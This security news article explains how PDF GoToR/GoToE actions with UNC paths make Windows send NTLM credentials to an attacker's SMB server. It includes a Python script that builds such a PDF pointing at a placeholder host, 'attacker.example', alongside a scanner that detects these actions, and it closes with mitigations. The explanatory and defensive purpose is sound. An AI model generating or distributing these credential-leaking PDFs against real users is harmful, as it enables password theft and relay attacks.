How Hackers Can Steal Windows Credentials Using a PDF File

Cybercriminals can exploit PDF files to steal Windows credentials (NTLM hashes) with no interaction beyond opening the file. In research published this week, Check Point researcher Assaf Baharav demonstrated how an attacker can use a standard, built-in PDF feature to capture NTLM authentication material. Strictly speaking, what leaks is not the NT hash that Windows stores for the account but the NTLM challenge-response (often called a Net-NTLMv2 hash) that Windows computes from it when it authenticates to a server; that response can be cracked offline to recover the password.

According to Baharav, the PDF specification allows a document to reference content in another file through the GoToR (Go To Remote) and GoToE (Go To Embedded) actions. Each action carries a file specification, and nothing in the format prevents that specification from being a UNC path on a server the attacker controls. During his research, Baharav created a PDF document that uses these actions. When the document is opened, the reader resolves the path, which makes Windows open an SMB connection to the remote, malicious SMB server. Because Windows attempts NTLM single sign-on by default, the connection carries the username, the domain and an NTLM challenge-response derived from the user's password hash, all of which the malicious server logs. Attackers can then crack the captured response offline with existing tools to recover the password, or relay it to another service that accepts NTLM authentication.
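To make the mechanism concrete, the following Python script is an added example written for this article; it is not Check Point's proof of concept and not code from Adobe or Foxit. It assembles a minimal PDF whose /OpenAction is a GoToR action with a UNC file specification, the same construction the paragraph above describes, and then runs a small scanner over the bytes that reports every GoToR/GoToE action and whether its /F target points off the local machine. The host name `attacker.example` is a placeholder, and the function names (`build_pdf_with_open_action`, `scan_pdf_actions`, `read_literal`) are this example's own.

```python
import re
from typing import Dict, List

# ---- Constructing a document that carries a GoToR/GoToE action ----

def pdf_literal(s: str) -> str:
    """Encode s as a PDF literal string; backslashes and parentheses must be escaped."""
    return "(" + s.replace("\\", "\\\\").replace("(", "\\(").replace(")", "\\)") + ")"

def build_pdf_with_open_action(action: str, file_spec: str) -> bytes:
    """Minimal one-page PDF whose /OpenAction is a GoToR or GoToE action with the
    given /F file specification. A reader that honours the action resolves the
    path when the document is opened; for a UNC path (\\\\host\\share\\x) that
    means an SMB connection, which Windows authenticates with NTLM by default."""
    if action not in ("GoToR", "GoToE"):
        raise ValueError("action must be GoToR or GoToE")
    objects = [
        "<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >>",
        "<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        "<< /Type /Page /Parent 2 0 R /MediaBox [0 0 200 200] >>",
        f"<< /Type /Action /S /{action} /F {pdf_literal(file_spec)} /D [0 /Fit] >>",
    ]
    out = bytearray(b"%PDF-1.7\n")
    offsets = []
    for num, body in enumerate(objects, start=1):
        offsets.append(len(out))
        out += f"{num} 0 obj\n{body}\nendobj\n".encode("latin-1")
    xref_pos = len(out)
    # Each xref entry is exactly 20 bytes, as the format requires.
    out += f"xref\n0 {len(objects) + 1}\n0000000000 65535 f \n".encode()
    for off in offsets:
        out += f"{off:010d} 00000 n \n".encode()
    out += (f"trailer\n<< /Size {len(objects) + 1} /Root 1 0 R >>\n"
            f"startxref\n{xref_pos}\n%%EOF\n").encode()
    return bytes(out)

# ---- Scanning a document for such actions (the check a defender wants) ----

OBJ_RE = re.compile(rb"(\d+)\s+\d+\s+obj(.*?)endobj", re.S)
ACTION_RE = re.compile(rb"/S\s*/(GoToR|GoToE)\b")
FILE_KEY_RE = re.compile(rb"/U?F\s*\(")  # /F (...) or /UF (...) literal strings
ESCAPES = {b"n": b"\n", b"r": b"\r", b"t": b"\t", b"b": b"\b", b"f": b"\f",
           b"(": b"(", b")": b")", b"\\": b"\\"}

def read_literal(data: bytes, start: int) -> bytes:
    """Decode the PDF literal string whose opening '(' is at data[start],
    honouring backslash escapes, octal escapes and balanced nested parentheses."""
    depth, i, out = 0, start, bytearray()
    while i < len(data):
        c = data[i:i + 1]
        if c == b"\\":
            nxt = data[i + 1:i + 2]
            if nxt in ESCAPES:
                out += ESCAPES[nxt]
                i += 2
            else:
                m = re.match(rb"[0-7]{1,3}", data[i + 1:i + 4])
                if m:
                    out.append(int(m.group(), 8) & 0xFF)
                    i += 1 + len(m.group())
                else:
                    i += 2  # unknown escape or line continuation: drop the backslash
            continue
        if c == b"(":
            depth += 1
            if depth > 1:
                out += c
        elif c == b")":
            depth -= 1
            if depth == 0:
                return bytes(out)
            out += c
        else:
            out += c
        i += 1
    raise ValueError("unterminated literal string")

def is_remote_spec(spec: str) -> bool:
    """UNC path in either spelling the format allows (\\\\host or //host), or a URL."""
    return (spec.startswith("\\\\") or spec.startswith("//")
            or re.match(r"[A-Za-z][A-Za-z0-9+.-]*://", spec) is not None)

def scan_pdf_actions(data: bytes) -> List[Dict[str, object]]:
    """Report every GoToR/GoToE action found in plain (uncompressed) objects
    together with its /F target. Objects packed into compressed object streams
    (PDF 1.5+) are not inspected by this simple scanner."""
    findings = []
    for m in OBJ_RE.finditer(data):
        body = m.group(2)
        act = ACTION_RE.search(body)
        if not act:
            continue
        for key in FILE_KEY_RE.finditer(body):
            target = read_literal(body, key.end() - 1).decode("latin-1")
            findings.append({"object": int(m.group(1)), "action": act.group(1).decode(),
                             "target": target, "remote": is_remote_spec(target)})
    return findings

if __name__ == "__main__":
    # Constructed sample; attacker.example is a placeholder, not a real host.
    sample = build_pdf_with_open_action("GoToR", r"\\attacker.example\share\bait.pdf")
    for finding in scan_pdf_actions(sample):
        print(finding)
```

The scanner deliberately treats a plain relative reference such as `appendix.pdf` as local and only flags UNC paths and URLs, since legitimate documents do use GoToR to link neighbouring files. Real-world samples frequently hide objects in compressed object streams or split the `/GoToR` name with hex escapes, so a production check should decompress the file with a proper PDF parser before applying the same logic.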

This type of attack is not new—it has previously been carried out by triggering SMB requests from Outlook and Office documents, shared folders, and more. Now, PDF documents have been added to the list of potential attack vectors.

Baharav successfully tested the attack on Adobe Acrobat and Foxit Reader, and privately notified both vendors. Foxit did not respond, while Adobe stated that it does not plan to take any action, pointing instead to Microsoft's existing security advisory ADV170014.

Microsoft released advisory ADV170014 in October 2017. It describes an optional hardening that disables NTLM SSO authentication for public (non-local) network resources, so that SMB requests to servers outside the local network no longer hand out the user's NTLM hash. Because the setting is opt-in, a default Windows installation remains exposed; blocking outbound SMB (TCP port 445) at the network perimeter is the usual complementary control, since the attacker's server must be reachable for the hash to leave the network at all.

What Is Single Sign-On (SSO)?

Single Sign-On (SSO) lets a user authenticate once and then reach multiple systems or applications without re-entering credentials. In Windows, NTLM SSO is what allows the operating system to answer a file server's authentication challenge automatically with the logged-on user's credentials. That convenience is exactly what the PDF attack relies on: the reader only has to make Windows connect to an attacker-controlled SMB server, and Windows supplies the NTLM response on the user's behalf.
